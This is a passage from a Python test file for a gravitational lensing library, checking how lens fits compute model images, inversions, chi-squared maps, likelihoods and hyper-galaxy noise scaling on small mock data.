padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image) == scaled_array.ScaledSquarePixelArray
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image) == scaled_array.ScaledSquarePixelArray
def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_is_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0),
pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image == None
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image == None
class TestUnmaskedModelImageOfPlanes:
def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image_of_planes == None
def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_image_returns_array(self,
lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes[1]) == scaled_array.ScaledSquarePixelArray
def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_of_that_plane_is_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0),
pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image_of_planes[0] == None
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g.Galaxy()],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image_of_planes[0] == None
assert type(fit.unmasked_model_image_of_planes[1]) == scaled_array.ScaledSquarePixelArray
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes[0]) == scaled_array.ScaledSquarePixelArray
assert fit.unmasked_model_image_of_planes[1] == None
class TestUnmaskedModelImageOfPlanesAndGalaxies:
def test__padded_tracer_is_none__unmasked_model_images_return_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=None, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image_of_planes_and_galaxies == None
def test__padded_tracer_input__all_planes_have_light_profiles__unmasked_model_images_returns_array(self,
lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][1]) == scaled_array.ScaledSquarePixelArray
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g0], source_galaxies=[g0, g0, g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][1]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][1]) == scaled_array.ScaledSquarePixelArray
assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][2]) == scaled_array.ScaledSquarePixelArray
def test__galaxy_in_tracer_has_pixelization__unmasked_model_image_of_that_galaxy_is_none(self, lens_data_blur):
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
g_pix = g.Galaxy(pixelization=pixelizations.Rectangular(), regularization=regularization.Constant())
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data_blur.grid_stack)
padded_tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g_pix],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert fit.unmasked_model_image_of_planes_and_galaxies[0][0] == None
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g_pix], source_galaxies=[g0],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
assert fit.unmasked_model_image_of_planes_and_galaxies[0][1] == None
assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy(), g_pix],
source_galaxies=[g0, g_pix],
image_plane_grid_stack=lens_data_blur.padded_grid_stack)
fit = lens_fit.AbstractLensFit(tracer=tracer, padded_tracer=padded_tracer, psf=lens_data_blur.psf,
map_to_scaled_array=lens_data_blur.map_to_scaled_array)
assert type(fit.unmasked_model_image_of_planes_and_galaxies[0][0]) == scaled_array.ScaledSquarePixelArray
assert fit.unmasked_model_image_of_planes_and_galaxies[0][1] == None
assert type(fit.unmasked_model_image_of_planes_and_galaxies[1][0]) == scaled_array.ScaledSquarePixelArray
assert fit.unmasked_model_image_of_planes_and_galaxies[1][1] == None
class TestAbstractLensProfileFit:
class TestBlurredImage:
def test__mock_tracer__2x2_image_all_1s__3x3_psf_all_1s__blurring_region__image_blurs_to_9s(self, lens_data_blur):
tracer = MockTracer(unblurred_image_1d=lens_data_blur.mask.map_2d_array_to_masked_1d_array(lens_data_blur.image),
blurring_image_1d=np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]),
has_light_profile=True, has_hyper_galaxy=False, has_pixelization=False)
fit = lens_fit.AbstractLensProfileFit(lens_data=lens_data_blur, tracer=tracer, padded_tracer=None)
assert (fit.blurred_profile_image == np.array([[0.0, 0.0, 0.0, 0.0],
[0.0, 9.0, 9.0, 0.0],
[0.0, 9.0, 9.0, 0.0],
[0.0, 0.0, 0.0, 0.0]])).all()
class TestAbstractLensInversionFit:
class TestModelImageOfPlanes:
def test__model_images_are_none_and_an_image(self):
image = np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0]])
mask = np.array([[True, True, True, True, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, False, False, False, True],
[True, True, True, True, True]])
mask = msk.Mask(mask, pixel_scale=1.0)
psf = ccd.PSF(array=np.array([[0.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 0.0]]), pixel_scale=1.0)
ccd_data = ccd.CCDData(image=image, pixel_scale=1.0, psf=psf, noise_map=np.ones((5, 5)))
lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=2)
galaxy_pix = g.Galaxy(pixelization=pixelizations.Rectangular(shape=(3, 3)),
regularization=regularization.Constant(coefficients=(1.0,)))
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[galaxy_pix],
image_plane_grid_stack=lens_data.grid_stack, border=None)
fit = lens_fit.AbstractLensInversionFit(lens_data=lens_data, noise_map_1d=lens_data.noise_map_1d,
tracer=tracer)
assert fit.model_image_of_planes[0] == None
assert fit.model_image_of_planes[1] == pytest.approx(np.array([[0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0]]), 1e-2)
class TestAbstractLensProfileInversionFit:
class TestModelImagesOfPlanes:
def test___model_images_of_planes_are_profile_and_inversion_images(self, lens_data_manual):
galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
pix = pixelizations.Rectangular(shape=(3, 3))
reg = regularization.Constant(coefficients=(1.0,))
galaxy_pix = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[galaxy_light], source_galaxies=[galaxy_pix],
image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
fit = lens_fit.AbstractLensProfileInversionFit(lens_data=lens_data_manual,
noise_map_1d=lens_data_manual.noise_map_1d,
tracer=tracer, padded_tracer=None)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_manual.convolver_image)
blurred_profile_image = lens_data_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
assert (fit.model_image_of_planes[0] == blurred_profile_image).all()
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_manual.convolver_image)
profile_subtracted_image_1d = lens_data_manual.image_1d - blurred_profile_image_1d
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
inversion = inversions.inversion_from_image_mapper_and_regularization(
image_1d=profile_subtracted_image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
convolver=lens_data_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
assert (fit.model_image_of_planes[1] == inversion.reconstructed_data).all()
class TestLensProfileFit:
class TestLikelihood:
def test__image__tracing_fits_data_perfectly__no_psf_blurring__lh_is_noise_normalization(self):
psf = ccd.PSF(array=(np.array([[0.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 0.0]])), pixel_scale=1.0)
ccd_data = ccd.CCDData(image=np.ones((3, 3)), pixel_scale=1.0, psf=psf, noise_map=np.ones((3, 3)))
mask = msk.Mask(array=np.array([[True, True, True],
[True, False, True],
[True, True, True]]), pixel_scale=1.0)
lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=1)
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data.grid_stack)
fit = lens_fit.LensProfileFit(lens_data=lens_data, tracer=tracer)
assert fit.likelihood == -0.5 * np.log(2 * np.pi * 1.0)
def test__1x2_image__tracing_fits_data_with_chi_sq_5(self):
psf = ccd.PSF(array=(np.array([[0.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 0.0]])), pixel_scale=1.0)
ccd_data = ccd.CCDData(5.0 * np.ones((3, 4)), pixel_scale=1.0, psf=psf, noise_map=np.ones((3, 4)))
ccd_data.image[1,2] = 4.0
mask = msk.Mask(array=np.array([[True, True, True, True],
[True, False, False, True],
[True, True, True, True]]), pixel_scale=1.0)
lens_data = ld.LensData(ccd_data=ccd_data, mask=mask, sub_grid_size=1)
# Setup as a ray trace instance, using a light profile for the lens
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=2))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0], image_plane_grid_stack=lens_data.grid_stack)
fit = lens_fit.LensProfileFit(lens_data=lens_data, tracer=tracer)
assert fit.chi_squared == 25.0
assert fit.reduced_chi_squared == 25.0 / 2.0
assert fit.likelihood == -0.5 * (25.0 + 2.0*np.log(2 * np.pi * 1.0))
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_manual):
g0 = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
g1 = g.Galaxy(mass_profile=mp.SphericalIsothermal(einstein_radius=1.0))
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g1], source_galaxies=[g0],
image_plane_grid_stack=lens_data_manual.grid_stack)
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0, g1], source_galaxies=[g0],
image_plane_grid_stack=lens_data_manual.padded_grid_stack)
fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer,
padded_tracer=padded_tracer)
assert lens_data_manual.noise_map == pytest.approx(fit.noise_map, 1e-4)
model_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_manual.convolver_image)
model_image = lens_data_manual.map_to_scaled_array(array_1d=model_image_1d)
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
mask=lens_data_manual.mask, model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(noise_map=lens_data_manual.noise_map,
mask=lens_data_manual.mask,)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
assert likelihood == fit.figure_of_merit
blurred_image_of_planes = util.blurred_image_of_planes_from_1d_images_and_convolver(
total_planes=tracer.total_planes, image_plane_image_1d_of_planes=tracer.image_plane_image_1d_of_planes,
image_plane_blurring_image_1d_of_planes=tracer.image_plane_blurring_image_1d_of_planes,
convolver=lens_data_manual.convolver_image, map_to_scaled_array=lens_data_manual.map_to_scaled_array)
assert (blurred_image_of_planes[0] == fit.model_image_of_planes[0]).all()
assert (blurred_image_of_planes[1] == fit.model_image_of_planes[1]).all()
unmasked_blurred_image = \
util.unmasked_blurred_image_from_padded_grid_stack_psf_and_unmasked_image(
padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf,
unmasked_image_1d=padded_tracer.image_plane_image_1d)
assert (unmasked_blurred_image == fit.unmasked_model_image).all()
unmasked_blurred_image_of_planes = \
util.unmasked_blurred_image_of_planes_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf)
assert (unmasked_blurred_image_of_planes[0] == fit.unmasked_model_image_of_planes[0]).all()
assert (unmasked_blurred_image_of_planes[1] == fit.unmasked_model_image_of_planes[1]).all()
unmasked_blurred_image_of_galaxies = \
util.unmasked_blurred_image_of_planes_and_galaxies_from_padded_grid_stack_and_psf(
planes=padded_tracer.planes, padded_grid_stack=lens_data_manual.padded_grid_stack, psf=lens_data_manual.psf)
assert (unmasked_blurred_image_of_galaxies[0][0] == fit.unmasked_model_image_of_planes_and_galaxies[0][0]).all()
assert (unmasked_blurred_image_of_galaxies[1][0] == fit.unmasked_model_image_of_planes_and_galaxies[1][0]).all()
class TestLensInversionFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_manual):
pix = pixelizations.Rectangular(shape=(3, 3))
reg = regularization.Constant(coefficients=(1.0,))
g0 = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g.Galaxy()], source_galaxies=[g0],
image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer)
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
inversion = inversions.inversion_from_image_mapper_and_regularization(mapper=mapper,
regularization=reg, image_1d=lens_data_manual.image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
convolver=lens_data_manual.convolver_mapping_matrix)
assert inversion.reconstructed_data == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
mask=lens_data_manual.mask, model_data=inversion.reconstructed_data)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_manual.mask,
noise_map=lens_data_manual.noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class TestLensProfileInversionFit:
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_manual):
galaxy_light = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0))
pix = pixelizations.Rectangular(shape=(3, 3))
reg = regularization.Constant(coefficients=(1.0,))
galaxy_pix = g.Galaxy(pixelization=pix, regularization=reg)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[galaxy_light], source_galaxies=[galaxy_pix],
image_plane_grid_stack=lens_data_manual.grid_stack, border=None)
fit = lens_fit.fit_lens_data_with_tracer(lens_data=lens_data_manual, tracer=tracer)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_manual.convolver_image)
blurred_profile_image = lens_data_manual.map_to_scaled_array(array_1d=blurred_profile_image_1d)
assert blurred_profile_image == pytest.approx(fit.blurred_profile_image, 1e-4)
profile_subtracted_image = lens_data_manual.image - blurred_profile_image
assert profile_subtracted_image == pytest.approx(fit.profile_subtracted_image)
blurred_profile_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_manual.convolver_image)
profile_subtracted_image_1d = lens_data_manual.image_1d - blurred_profile_image_1d
mapper = pix.mapper_from_grid_stack_and_border(grid_stack=lens_data_manual.grid_stack, border=None)
inversion = inversions.inversion_from_image_mapper_and_regularization(
image_1d=profile_subtracted_image_1d, noise_map_1d=lens_data_manual.noise_map_1d,
convolver=lens_data_manual.convolver_mapping_matrix, mapper=mapper, regularization=reg)
model_image = blurred_profile_image + inversion.reconstructed_data
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_manual.image,
mask=lens_data_manual.mask, model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_manual.mask, noise_map=lens_data_manual.noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
chi_squared = fit_util.chi_squared_from_chi_squared_map_and_mask(chi_squared_map=chi_squared_map,
mask=lens_data_manual.mask)
noise_normalization = fit_util.noise_normalization_from_noise_map_and_mask(mask=lens_data_manual.mask,
noise_map=lens_data_manual.noise_map)
likelihood = fit_util.likelihood_from_chi_squared_and_noise_normalization(chi_squared=chi_squared,
noise_normalization=noise_normalization)
assert likelihood == pytest.approx(fit.likelihood, 1e-4)
likelihood_with_regularization = \
util.likelihood_with_regularization_from_chi_squared_regularization_term_and_noise_normalization(
chi_squared=chi_squared, regularization_term=inversion.regularization_term,
noise_normalization=noise_normalization)
assert likelihood_with_regularization == pytest.approx(fit.likelihood_with_regularization, 1e-4)
evidence = util.evidence_from_inversion_terms(chi_squared=chi_squared,
regularization_term=inversion.regularization_term,
log_curvature_regularization_term=inversion.log_det_curvature_reg_matrix_term,
log_regularization_term=inversion.log_det_regularization_matrix_term, noise_normalization=noise_normalization)
assert evidence == fit.evidence
assert evidence == fit.figure_of_merit
class TestLensProfileHyperFit:
class TestLikelihood:
def test__hyper_galaxy_adds_to_noise_normalization__chi_squared_is_0(self, lens_data_hyper_no_blur):
# Setup as a ray trace instance, using a light profile for the lens
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=4))
g1 = g.Galaxy(light_profile=MockLightProfile(value=0.0, size=4))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g1],
image_plane_grid_stack=lens_data_hyper_no_blur.grid_stack)
lens_data_hyper_no_blur.hyper_model_image_1d = np.array([1.0, 1.0, 1.0, 1.0])
lens_data_hyper_no_blur.hyper_galaxy_images_1d = [np.array([1.0, 1.0, 1.0, 1.0]),
np.array([1.0, 1.0, 1.0, 1.0])]
tracer.image_plane.galaxies[0].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=1.0,
noise_power=1.0)
tracer.image_plane.galaxies[1].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=2.0,
noise_power=1.0)
fit = lens_fit.LensProfileHyperFit(lens_data_hyper=lens_data_hyper_no_blur, tracer=tracer)
chi_squared = 0.0
noise_normalization = 4.0 * np.log(2 * np.pi * 4.0 ** 2.0)
assert fit.likelihood == -0.5 * (chi_squared + noise_normalization)
def test__hyper_galaxy_adds_to_noise_normalization_for_scaled_noise__chi_squared_nonzero(self,
lens_data_hyper_no_blur):
lens_data_hyper_no_blur.image[1:3,1:3] = 2.0
g0 = g.Galaxy(light_profile=MockLightProfile(value=1.0, size=4))
g1 = g.Galaxy(light_profile=MockLightProfile(value=0.0, size=4))
tracer = ray_tracing.TracerImagePlane(lens_galaxies=[g0, g1],
image_plane_grid_stack=lens_data_hyper_no_blur.grid_stack)
lens_data_hyper_no_blur.hyper_model_image_1d = np.array([1.0, 1.0, 1.0, 1.0])
lens_data_hyper_no_blur.hyper_galaxy_images_1d = [np.array([1.0, 1.0, 1.0, 1.0]),
np.array([1.0, 1.0, 1.0, 1.0])]
tracer.image_plane.galaxies[0].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=1.0,
noise_power=1.0)
tracer.image_plane.galaxies[1].hyper_galaxy = MockHyperGalaxy(contribution_factor=0.0, noise_factor=2.0,
noise_power=1.0)
fit = lens_fit.LensProfileHyperFit(lens_data_hyper=lens_data_hyper_no_blur, tracer=tracer)
chi_squared = 4.0 * (1.0 / (4.0)) ** 2.0
noise_normalization = 4.0 * np.log(2 * np.pi * 4.0 ** 2.0)
assert fit.likelihood == -0.5 * (chi_squared + noise_normalization)
class TestCompareToManual:
def test___manual_image_and_psf(self, lens_data_hyper_manual):
hyper_galaxy = g.HyperGalaxy(contribution_factor=4.0, noise_factor=2.0, noise_power=3.0)
g0 = g.Galaxy(light_profile=lp.EllipticalSersic(intensity=1.0), hyper_galaxy=hyper_galaxy)
tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0], source_galaxies=[g0],
image_plane_grid_stack=lens_data_hyper_manual.grid_stack)
padded_tracer = ray_tracing.TracerImageSourcePlanes(lens_galaxies=[g0], source_galaxies=[g0],
image_plane_grid_stack=lens_data_hyper_manual.padded_grid_stack)
fit = lens_fit.hyper_fit_lens_data_with_tracer(lens_data_hyper=lens_data_hyper_manual, tracer=tracer,
padded_tracer=padded_tracer)
contributions_1d = util.contribution_maps_1d_from_hyper_images_and_galaxies(
hyper_model_image_1d=lens_data_hyper_manual.hyper_model_image_1d,
hyper_galaxy_images_1d=lens_data_hyper_manual.hyper_galaxy_images_1d,
hyper_galaxies=tracer.hyper_galaxies, hyper_minimum_values=lens_data_hyper_manual.hyper_minimum_values)
contribution_maps = list(map(lambda contribution_1d :
lens_data_hyper_manual.map_to_scaled_array(array_1d=contribution_1d),
contributions_1d))
assert contribution_maps[0] == pytest.approx(fit.contribution_maps[0], 1.0e-4)
hyper_noise_map_1d = util.scaled_noise_map_from_hyper_galaxies_and_contribution_maps(
contribution_maps=contributions_1d, hyper_galaxies=tracer.hyper_galaxies,
noise_map=lens_data_hyper_manual.noise_map_1d)
hyper_noise_map = lens_data_hyper_manual.map_to_scaled_array(array_1d=hyper_noise_map_1d)
assert hyper_noise_map == pytest.approx(fit.noise_map, 1.0e-4)
model_image_1d = util.blurred_image_1d_from_1d_unblurred_and_blurring_images(
unblurred_image_1d=tracer.image_plane_image_1d, blurring_image_1d=tracer.image_plane_blurring_image_1d,
convolver=lens_data_hyper_manual.convolver_image)
model_image = lens_data_hyper_manual.map_to_scaled_array(array_1d=model_image_1d)
assert model_image == pytest.approx(fit.model_image, 1e-4)
residual_map = fit_util.residual_map_from_data_mask_and_model_data(data=lens_data_hyper_manual.image,
mask=lens_data_hyper_manual.mask,
model_data=model_image)
assert residual_map == pytest.approx(fit.residual_map, 1e-4)
chi_squared_map = fit_util.chi_squared_map_from_residual_map_noise_map_and_mask(residual_map=residual_map,
mask=lens_data_hyper_manual.mask, noise_map=hyper_noise_map)
assert chi_squared_map == pytest.approx(fit.chi_squared_map, 1e-4)
